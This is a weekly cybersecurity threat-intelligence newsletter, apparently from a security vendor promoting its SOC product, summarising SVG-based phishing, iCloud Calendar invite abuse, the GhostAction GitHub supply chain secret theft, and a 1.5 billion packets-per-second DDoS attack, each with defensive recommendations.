Cyber Security & Threat Intelligence Report | Phishing, Supply Chain, DDoS & SOC Insights

Essential Weekly Cyber Security & Threat Intelligence – September 14

This week in cyber has seen a rise in sophisticated phishing campaigns, supply chain compromises, and record-breaking DDoS attacks. From malicious SVG files to iCloud calendar abuse, the tactics show how attackers continue to exploit trusted services and overlooked technologies. At the same time, large-scale attacks on GitHub and European network providers highlight the scale and persistence of modern cyber threats, underlining the importance of network detection, SOC monitoring, and proactive threat intelligence.

VirusTotal Uncovers SVG Files Used in Phishing and Malware Campaign

Category: Phishing | Malware Delivery | File Exploitation

VirusTotal identified a phishing campaign using SVG files to impersonate Colombia’s judicial system and distribute malware. By leveraging the <foreignObject> element, attackers embedded HTML and JavaScript within SVGs to create fake portals. Victims were tricked into downloading a password-protected ZIP file, with the password displayed on the fake page.

Traditional antivirus tools failed to detect the malicious files, but VirusTotal’s AI-powered Code Insight flagged their suspicious behaviour.

Threat Intelligence Insight: File types once considered safe are increasingly being weaponised for phishing and malware delivery. Organisations should ensure their SOC monitoring and file scanning solutions extend to non-traditional formats such as SVGs.

Scammers Use iCloud Calendar Invites to Bypass Email Security

Category: Phishing | Social Engineering | Email Security Bypass

Attackers are exploiting Apple’s iCloud Calendar invites to deliver phishing scams, sending fake PayPal receipts via noreply@email.apple.com. These appear legitimate because they bypass SPF, DKIM, and DMARC filters.

The payload is hidden in the invite’s Notes field, prompting victims to call a fake “support” line where they risk giving attackers remote access or installing malware.

SOC Monitoring Takeaway: This demonstrates how trusted platforms can be abused to evade email filtering. Organisations should extend phishing detection beyond email gateways and educate users to be cautious of unexpected calendar invites or system messages.

Hackers Steal 3,325 Secrets in GhostAction GitHub Supply Chain Attack

Category: Supply Chain Attack | Credential Theft | Developer Security

On September 2nd, GitGuardian researchers discovered GhostAction, a supply chain campaign targeting GitHub Actions workflows. Attackers compromised maintainer accounts and injected malicious workflows to exfiltrate secrets directly from CI/CD environments.

The attack impacted 817 repositories and 327 GitHub users, with 3,325 secrets stolen. Exfiltrated data was sent to a malicious domain before the endpoint was shut down. GitHub, npm, and PyPI were notified, and GitGuardian raised issues across hundreds of affected projects.

Threat Intelligence Note: This campaign highlights the growing risk of software supply chain attacks. Development teams must enforce strong identity protection, workflow integrity checks, and continuous monitoring across GitHub and CI/CD environments.

European DDoS Defender Hit by 1.5 Billion PPS Attack

Category: DDoS | Network Security | Botnet Activity

A European DDoS scrubbing provider was targeted with an unprecedented 1.5 billion packets-per-second (Bpps) attack. The volumetric assault originated from thousands of MikroTik routers and IoT devices spanning more than 11,000 networks worldwide.

The attack, mitigated by FastNetMon, came just days after Cloudflare defended against an 11.5 Tbps / 5.1 Bpps DDoS — underscoring a trend of increasingly hyper-scale denial-of-service campaigns.

Network Detection & Response Lesson: These attacks demonstrate the urgent need for ISP-level detection logic and enterprise adoption of adaptive network detection and response capabilities to defend against large-scale botnet activity.

Analyst Insight

This week’s cyber events highlight how attackers are innovating across multiple fronts:

• SVG-based phishing campaigns show how creative abuse of overlooked file types can bypass traditional defenses.
• Abuse of Apple’s iCloud Calendar reinforces the trend of attackers exploiting legitimate services to increase trust and bypass filters.
• GhostAction’s GitHub supply chain compromise demonstrates how vulnerable the software development ecosystem remains to secret theft
• DDoS campaigns peaking at 1.5 billion PPS reveal the growing danger of IoT-driven botnets at Internet scale.
• Enterprises should prioritise SOC monitoring, file scanning across diverse formats, zero-trust vendor controls, and AI-powered network detection and response to stay ahead of these evolving threats.

Protect Your Network Today

Stay ahead of threats with AI-powered detection and SOC monitoring.

➡️ Request a demo and see IntSOC in action.